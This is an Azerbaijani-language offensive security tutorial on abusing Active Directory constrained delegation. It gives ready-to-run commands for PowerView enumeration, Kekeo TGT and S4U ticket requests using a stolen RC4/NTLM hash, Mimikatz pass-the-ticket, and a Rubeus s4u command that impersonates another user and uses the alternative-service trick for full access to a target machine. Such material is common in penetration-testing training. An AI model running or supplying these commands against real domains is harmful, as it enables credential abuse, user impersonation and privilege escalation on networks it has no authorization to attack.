Constrained Delegation

Constrained Delegation (Məhdud Nümayəndəlik) Active Directory'də xidmətlər və sistemlər arasında istifadəçi etimadnamələrinin ötürülməsinə daha dəqiq nəzarət etməyə imkan verən funksiyadır. Məhdudiyyətsiz Nümayəndəlikdən (Unconstrained Delegation) fərqli olaraq, Məhdud Nümayəndəlik administratorlara müəyyən bir xidmətin etimadnamələrini hansı xidmətlərə ötürə biləcəyini müəyyən etmək imkanı verir.

Bu məqamda, Kekeo adlı alətdən istifadə edərək Kerberos Ticket Granting Ticket (TGT) manipulyasiyası həyata keçirmək mümkündür. istifadə edərək yükləyə bilərsiniz.

PowerView

Aşağıdakı PowerShell əmrlərindən istifadə edərək Constrained Delegation istifadəçiləri və kompüterləri əldə edə bilərik:

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

Kekeo

Məhdud nümayəndə heyəti olan istifadəçimiz varsa, kekeo istifadə edərək bu istifadəçinin etibarlı tgt-ni istəyə bilərik:

tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>

tgt::ask: Ticket Granting Ticket (TGT) tələb etmək üçün əmr

/rc4:<hashedPasswordOfTheUser>: İstifadəçinin RC4-hashed parolunu göstərir. RC4 şifrələmə üçün istifadə olunan simmetrik açar alqoritmidir.

Sonra TGT'dən istifadə edərək Servisə TGS üçün müraciət edirik:

tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>

Mimikatz

İndi isə Pass-the-Ticket (PTT) hücumu həyata keçirmək üçün Invoke-Mimikatz PowerShell skriptindən istifadə edirik:

Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'

Rubeus ilə hücum

Aşağıdakı Rubeus əmri ilə "s4u" (Service for User) hücumu həyata keçiririk, hansı ki, bu hücum həm də "constrained delegation" hücumu kimi bilinir:

Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /ptt

• /rc4:<NTLMhashedPasswordOfTheUser>: İstifadəçinin NTLM hash parolunu göstərir.

• /impersonateuser:<UserToImpersonate>: Təqlid etmək istədiyin istifadəçini göstərir.

• /msdsspn:"<Service's SPN>": Hücum etmək istədiyin xidmətin SPN'i (Service Principal Name) təyin edir.

• /altservice:<Optional>: Digər bir alternativ xidməti təyin edir.

• /ptt: Əldə edilən bileti cari sessiya enjektə edərək Pass-the-Ticket hücumun həyata keçirilməsini əmr edir.

Yalnız spesifik SPN üçün nümayəndəlik hüquqlarımız varsa nə etməliyik?

Bu halda biz kerberosun "alternative service"(alternativ xidmət) adlı xüsusiyyətindən istifadə edə bilərik. Bu xüsusiyyət bizə imkan verir ki, təkcə bizim hüququmuz olan xidmət üçün yox, digər "alternativ" xidmətlər üçün də TGS bileti tələb edə bilək. Bununla biz istənilən xidmət üçün etibarlı biletlər və hədəf maşın üzərində tam giriş imkanı əldə edirik.